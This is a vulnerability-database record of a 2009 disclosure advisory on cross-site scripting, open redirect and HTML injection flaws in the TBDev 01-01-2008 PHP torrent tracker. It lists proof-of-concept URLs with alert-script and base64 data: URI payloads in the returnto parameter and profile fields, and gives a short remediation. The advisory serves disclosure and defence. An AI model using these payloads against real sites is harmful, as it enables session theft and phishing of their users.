TBDev 01-01-2008 Multiple Remote Vulnerabilities

2009-06-12T00:00:00

Description

No description provided by source.

{"href": "https://www.seebug.org/vuldb/ssvid-12958", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-06-12T00:00:00", "title": "TBDev 01-01-2008 Multiple Remote Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12958", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2009-06-12T00:00:00", "sourceData": "\n TBDev - Cross Site Scripting and HTML Injection Vulnerabilities\n\nVersion Affected: 01-01-2008 (16th January 2008) (newest)\n\nInfo: TBDEV.NET is a project to further enhance, update and develop a\nsoftware (php peer-to-peer) from the original torrentbits/bytemonsoon\nsource code.\n\nCredits: InterN0T\n\nExternal Links:\nhttp://www.tbdev.net\n\n\n-:: The Advisory ::-\n\nVulnerable Function / ID Calls:\nreturnto\n\nCross Site Scripting: (Sysops / Mods Only!)\nhttp://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>\nhttp://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script>alert(0)</script><br\n\nCross Site Script Redirection: (Sysops / Mods Only!)\nhttp://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1\n\nCross Site Script Redirection: (Anyone, the enduser will need to log in\nthough)\nhttp://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]\nhttp://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\n\nHTML Injection:\n1) http://[HOST]/tbdev/tbdev-01-01-08/my.php\n-- Info field: </textarea><script>alert(0)</script> << is reflected\nlocally only!\n\n2) http://[HOST]/tbdev/tbdev-01-01-08/my.php\n-- Avatar field: javascript:alert(0)\n\n2b) Affected Sites by HTML Injection:\nhttp://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID\n\nInternet Explorer 6 and perhaps 7 should be triggered by this.\nPlease see: http://ha.ckers.org/xss.html for more information.\nBrowser Tested: Internet Explorer 7 (FireFox 3 was tested for the other\nvulnerabilities)\n\n-:: Solution ::-\nSecure redirection calls with referer headers (just an example) and\nfilter bad characters.\n\nConclusion:\nThis system was fun to find bad code in, it sure had a nice diversity of\nvulnerabilities.\n\nReference:\nhttp://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html\n\nDisclosure Information:\n- Vulnerabilities found, researched and confirmed between 5th to 10th June.\n- Advisory finished and published on InterN0T the 12th June.\n- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.\n\n\nAll of the best,\nMaXe\n\n# sebug.net\n\n ", "id": "SSV:12958", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:52:01", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647736761}}